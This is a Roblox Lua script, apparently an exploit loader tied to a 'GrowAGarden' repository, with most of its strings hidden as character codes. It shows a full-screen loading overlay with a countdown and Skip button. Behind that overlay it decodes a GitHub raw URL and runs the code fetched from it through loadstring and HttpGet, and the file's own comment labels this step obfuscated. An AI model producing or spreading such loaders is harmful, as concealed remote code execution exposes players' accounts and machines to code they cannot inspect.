return(function()
    local a = game["\071\101\116\083\101\114\118\105\099\101"]
    local b = a(game, "\080\108\097\121\101\114\115")
    local c = a(game, "\084\119\101\101\110\083\101\114\118\105\099\101")
    local d = a(game, "\085\115\101\114\073\110\112\117\116\083\101\114\118\105\099\101")

    local e = Instance["\110\101\119"](string.char(83, 99, 114, 101, 101, 110, 71, 117, 105))
    e.Name = "\067\117\115\116\111\109\076\111\097\100\105\110\103"
    e.IgnoreGuiInset = true
    e.ResetOnSpawn = false
    e.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
    e.Parent = b.LocalPlayer:WaitForChild("\080\108\097\121\101\114\071\117\105")

    local f = Instance["\110\101\119"]("\070\114\097\109\101")
    f.Size = UDim2.new(1, 0, 1, 0)
    f.BackgroundColor3 = Color3.new(0, 0, 0)
    f.BackgroundTransparency = 1
    f.ZIndex = 10
    f.Parent = e

    c:Create(f, TweenInfo.new(1), {BackgroundTransparency = 0}):Play()

    local g = Instance["\110\101\119"]("\084\101\120\116\076\097\098\101\108")
    g.Size = UDim2.new(0.6, 0, 0.1, 0)
    g.Position = UDim2.new(0.2, 0, 0.4, 0)
    g.BackgroundTransparency = 1
    g.TextColor3 = Color3.new(1, 1, 1)
    g.TextScaled = true
    g.Font = Enum.Font.GothamBold
    g.Text = "\076\111\097\100\105\110\103\046\046\046"
    g.Parent = f

    local h = Instance["\110\101\119"]("\084\101\120\116\076\097\098\101\108")
    h.Size = UDim2.new(0.6, 0, 0.08, 0)
    h.Position = UDim2.new(0.2, 0, 0.5, 0)
    h.BackgroundTransparency = 1
    h.TextColor3 = Color3.new(1, 1, 1)
    h.TextScaled = true
    h.Font = Enum.Font.Gotham
    h.Text = ""
    h.Parent = f

    local i = Instance["\110\101\119"]("\084\101\120\116\066\117\116\116\111\110")
    i.Size = UDim2.new(0.3, 0, 0.08, 0)
    i.Position = UDim2.new(0.35, 0, 0.65, 0)
    i.BackgroundColor3 = Color3.fromRGB(30, 30, 30)
    i.TextColor3 = Color3.new(1, 1, 1)
    i.TextScaled = true
    i.Text = "\083\107\105\112"
    i.Font = Enum.Font.GothamBold
    i.Visible = false
    i.AutoButtonColor = true
    i.ZIndex = 11
    i.BackgroundTransparency = 0.2
    i.ClipsDescendants = true
    i.AnchorPoint = Vector2.new(0, 0)
    i.Parent = f

    local j = 15
    local k = false

    task.delay(5, function()
        i.Visible = true
    end)

    i.MouseButton1Click:Connect(function()
        k = true
        j = 0
    end)

    task.spawn(function()
        while j > 0 do
            h.Text = "\083\116\097\114\116\105\110\103\032\105\110\032" .. j .. "\115"
            j -= 1
            wait(1)
        end
    end)

    repeat wait(0.1) until j <= 0

    -- Obfuscated loadstring + HttpGet
    pcall(function()
        local s = string.char
        local url = s(104,116,116,112,115,58,47,47)..s(114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109).."/"..s(83,99,114,105,112,116,45,68,101,118,101,108,111,112,101,114).."/"..s(71,114,111,119,65,71,97,114,100,101,110).."/"..s(114,101,102,115).."/"..s(104,101,97,100,115).."/"..s(109,97,105,110).."/"..s(100,54,101,56,53,51,50,98,97,102,57,48,101,100,97,53,56,99,51,57,56,48,52,55,57,56,56,53,55,52,49,53,46,116,120,116)
        loadstring(game:HttpGet(url))()
    end)

    c:Create(f, TweenInfo.new(1), {BackgroundTransparency = 1}):Play()
    c:Create(g, TweenInfo.new(1), {TextTransparency = 1}):Play()
    c:Create(h, TweenInfo.new(1), {TextTransparency = 1}):Play()
    c:Create(i, TweenInfo.new(1), {TextTransparency = 1, BackgroundTransparency = 1}):Play()

    wait(1.2)
    e:Destroy()
end)()
